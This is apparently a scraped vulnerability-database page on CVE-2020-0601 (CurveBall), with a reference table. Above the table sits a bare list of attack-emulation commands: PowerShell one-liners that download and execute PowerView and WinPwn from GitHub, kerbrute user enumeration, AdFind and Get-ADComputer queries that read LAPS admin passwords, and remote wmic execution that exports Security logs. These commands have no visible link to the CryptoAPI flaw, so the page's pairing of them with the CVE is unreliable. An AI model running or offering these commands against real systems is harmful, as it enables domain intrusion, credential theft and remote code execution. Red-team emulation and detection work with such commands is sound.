IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-0601 |
| portal.msrc.microsoft.com |
GitHub CVE
x_refsource_MISC
|
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/155961/CurveBall-Microsoft-Windows-CryptoAPI-Spoofing-Proof-Of-Concept.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/155960/CurveBall-Microsoft-Windows-CryptoAPI-Spoofing-Proof-Of-Concept.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-0601 |